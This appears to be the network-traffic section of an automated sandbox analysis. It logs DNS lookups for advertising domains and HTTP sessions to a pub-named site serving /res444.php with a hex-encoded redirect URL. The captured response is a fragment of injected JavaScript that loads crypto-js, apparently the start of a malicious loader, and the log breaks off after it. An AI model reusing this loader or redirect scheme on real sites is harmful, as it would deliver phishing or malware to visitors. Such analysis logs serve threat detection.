                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com3.218.222.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com52.0.112.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.757683992 CEST1.1.1.1192.168.2.40x4475No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.757725954 CEST1.1.1.1192.168.2.40x993aNo error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:53.065665960 CEST1.1.1.1192.168.2.40xa2acNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:53.065704107 CEST1.1.1.1192.168.2.40xb06eNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:53.065704107 CEST1.1.1.1192.168.2.40xb06eNo error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.498197079 CEST1.1.1.1192.168.2.40x6897No error (0)thrtl.redinuid.imrworldwide.comsimple-redirect.redinuid.sre.nielsen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.498197079 CEST1.1.1.1192.168.2.40x6897No error (0)simple-redirect.redinuid.sre.nielsen.comsimple-redirect-eu-west-1-kaas-blue.sre.nielsen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.498197079 CEST1.1.1.1192.168.2.40x6897No error (0)simple-redirect-eu-west-1-kaas-blue.sre.nielsen.com54.73.156.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.498197079 CEST1.1.1.1192.168.2.40x6897No error (0)simple-redirect-eu-west-1-kaas-blue.sre.nielsen.com52.18.80.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.498197079 CEST1.1.1.1192.168.2.40x6897No error (0)simple-redirect-eu-west-1-kaas-blue.sre.nielsen.com34.250.22.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.543557882 CEST1.1.1.1192.168.2.40x56d9No error (0)thrtl.redinuid.imrworldwide.comsimple-redirect.redinuid.sre.nielsen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.543557882 CEST1.1.1.1192.168.2.40x56d9No error (0)simple-redirect.redinuid.sre.nielsen.comsimple-redirect-eu-west-1-kaas-blue.sre.nielsen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com34.236.178.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com35.170.228.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com3.218.222.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com35.153.224.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com52.0.112.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com44.210.232.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com3.227.42.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.634953022 CEST1.1.1.1192.168.2.40xf50fNo error (0)nlsn.thrtle.com23.23.29.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:05.807552099 CEST1.1.1.1192.168.2.40x43a6No error (0)a3552.casalemedia.com209.204.233.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:06.617302895 CEST1.1.1.1192.168.2.40x3536No error (0)a3552.casalemedia.com209.204.233.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.374820948 CEST1.1.1.1192.168.2.40x8faeNo error (0)s0.2mdn.net172.217.18.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.561341047 CEST1.1.1.1192.168.2.40x7f62No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.562016010 CEST1.1.1.1192.168.2.40x4429No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.562016010 CEST1.1.1.1192.168.2.40x4429No error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.564517975 CEST1.1.1.1192.168.2.40x3e0aNo error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.564517975 CEST1.1.1.1192.168.2.40x3e0aNo error (0)image6v2.pubmnet.compugm-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.564517975 CEST1.1.1.1192.168.2.40x3e0aNo error (0)pugm-amsfpairbc.pubmnet.com198.47.127.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.566044092 CEST1.1.1.1192.168.2.40xf61fNo error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.566044092 CEST1.1.1.1192.168.2.40xf61fNo error (0)image6v2.pubmnet.compugm-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)secure.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256894112 CEST1.1.1.1192.168.2.40x8532No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.257574081 CEST1.1.1.1192.168.2.40xb1edNo error (0)cms.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.257574081 CEST1.1.1.1192.168.2.40xb1edNo error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.257574081 CEST1.1.1.1192.168.2.40xb1edNo error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.257574081 CEST1.1.1.1192.168.2.40xb1edNo error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.257574081 CEST1.1.1.1192.168.2.40xb1edNo error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.257574081 CEST1.1.1.1192.168.2.40xb1edNo error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.259109020 CEST1.1.1.1192.168.2.40x6237No error (0)cms.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.259109020 CEST1.1.1.1192.168.2.40x6237No error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.261136055 CEST1.1.1.1192.168.2.40xf508No error (0)casale-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.262691021 CEST1.1.1.1192.168.2.40xb7a4No error (0)casale-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.264125109 CEST1.1.1.1192.168.2.40xded1No error (0)ads.creative-serving.comhttplb-gce-nl-clickdistrict.clickdistrict.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.264957905 CEST1.1.1.1192.168.2.40x498eNo error (0)ads.creative-serving.comhttplb-gce-nl-clickdistrict.clickdistrict.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.264957905 CEST1.1.1.1192.168.2.40x498eNo error (0)httplb-gce-nl-clickdistrict.clickdistrict.iponweb.net35.214.241.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.409167051 CEST1.1.1.1192.168.2.40x1792No error (0)ad.doubleclick.net142.250.185.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.409400940 CEST1.1.1.1192.168.2.40xe820No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.890475035 CEST1.1.1.1192.168.2.40x3765No error (0)d.turn.comd-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.891336918 CEST1.1.1.1192.168.2.40xe696No error (0)d.turn.comd-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.891336918 CEST1.1.1.1192.168.2.40xe696No error (0)d-ams1.turn.com46.228.164.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.968251944 CEST1.1.1.1192.168.2.40xb22fNo error (0)js-sec.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.968461037 CEST1.1.1.1192.168.2.40x329bNo error (0)js-sec.indexww.com172.64.149.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.968461037 CEST1.1.1.1192.168.2.40x329bNo error (0)js-sec.indexww.com104.18.38.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.004204035 CEST1.1.1.1192.168.2.40xa42eNo error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.005208969 CEST1.1.1.1192.168.2.40x3700No error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.005208969 CEST1.1.1.1192.168.2.40x3700No error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.675832987 CEST1.1.1.1192.168.2.40x9cf0No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.676263094 CEST1.1.1.1192.168.2.40x6a59No error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.676263094 CEST1.1.1.1192.168.2.40x6a59No error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.728797913 CEST1.1.1.1192.168.2.40x5372No error (0)s0.2mdn.net172.217.18.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.041065931 CEST1.1.1.1192.168.2.40x7516No error (0)dsum.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.041065931 CEST1.1.1.1192.168.2.40x7516No error (0)dsum.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.041101933 CEST1.1.1.1192.168.2.40x3f2No error (0)dsum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.588170052 CEST1.1.1.1192.168.2.40xbcdaNo error (0)live.rezync.com65.9.66.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.588170052 CEST1.1.1.1192.168.2.40xbcdaNo error (0)live.rezync.com65.9.66.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.588170052 CEST1.1.1.1192.168.2.40xbcdaNo error (0)live.rezync.com65.9.66.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.588170052 CEST1.1.1.1192.168.2.40xbcdaNo error (0)live.rezync.com65.9.66.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.705759048 CEST1.1.1.1192.168.2.40xc8b8No error (0)dsum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.705869913 CEST1.1.1.1192.168.2.40xa6eNo error (0)dsum.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.705869913 CEST1.1.1.1192.168.2.40xa6eNo error (0)dsum.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:11.714937925 CEST1.1.1.1192.168.2.40xf96cNo error (0)ad.doubleclick.net142.250.185.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:11.717247009 CEST1.1.1.1192.168.2.40x68f4No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:12.324729919 CEST1.1.1.1192.168.2.40x3b27No error (0)gcdn.2mdn.net172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:13.333512068 CEST1.1.1.1192.168.2.40x8c75No error (0)r1---sn-ab5sznzs.c.2mdn.netr1.sn-ab5sznzs.c.2mdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:13.333512068 CEST1.1.1.1192.168.2.40x8c75No error (0)r1.sn-ab5sznzs.c.2mdn.net74.125.174.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:13.408902884 CEST1.1.1.1192.168.2.40x7473No error (0)r1---sn-ab5sznzs.c.2mdn.netr1.sn-ab5sznzs.c.2mdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:13.408902884 CEST1.1.1.1192.168.2.40x7473No error (0)r1.sn-ab5sznzs.c.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:15.256902933 CEST1.1.1.1192.168.2.40x63cfNo error (0)pippio.com107.178.254.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:21.366791010 CEST1.1.1.1192.168.2.40x6da1No error (0)navvy.media.net34.160.55.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:21.402981997 CEST1.1.1.1192.168.2.40xd939No error (0)warp.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.310097933 CEST1.1.1.1192.168.2.40x8857No error (0)hblg.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.315279961 CEST1.1.1.1192.168.2.40x946aNo error (0)lg3.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.626987934 CEST1.1.1.1192.168.2.40xe1ffNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.627813101 CEST1.1.1.1192.168.2.40x5e2dNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.646455050 CEST1.1.1.1192.168.2.40x188bNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.646558046 CEST1.1.1.1192.168.2.40xbaf7No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.082186937 CEST1.1.1.1192.168.2.40x308cNo error (0)warp.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.311633110 CEST1.1.1.1192.168.2.40x2cfeNo error (0)lg3.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.321005106 CEST1.1.1.1192.168.2.40x37c5No error (0)hblg.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.610162020 CEST1.1.1.1192.168.2.40x73c5No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.611828089 CEST1.1.1.1192.168.2.40xbc8cNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.692110062 CEST1.1.1.1192.168.2.40x4969No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.692683935 CEST1.1.1.1192.168.2.40x5396No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              0192.168.2.44973069.49.245.1724431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:00 UTC666OUTGET /res444.php?2-68747470733a2f2f6f72746b6e2e6c6f766174696f6e796d652e636f6d2f35774c6d4e2f-cuckoo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mollysirishpub-tol.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:00 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:12:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:00 UTC1996INData Raw: 37 63 30 0d 0a 20 20 20 20 76 61 72 20 6f 52 6f 47 4c 6b 6a 46 6e 6b 75 52 53 7a 42 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 6f 52 6f 47 4c 6b 6a 46 6e 6b 75 52 53 7a 42 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 6f 52 6f 47 4c 6b 6a 46 6e 6b 75 52 53 7a 42 6d 29 3b 0d 0a 6f 52 6f 47 4c 6b 6a 46 6e 6b 75 52 53 7a 42 6d 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7c0 var oRoGLkjFnkuRSzBm = document.createElement("script");oRoGLkjFnkuRSzBm.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(oRoGLkjFnkuRSzBm);oRoGLkjFnkuRSzBm.onload=function()


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1192.168.2.44974369.49.245.1724431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:01 UTC438OUTGET /res444.php?2-68747470733a2f2f6f72746b6e2e6c6f766174696f6e796d652e636f6d2f35774c6d4e2f-cuckoo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mollysirishpub-tol.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
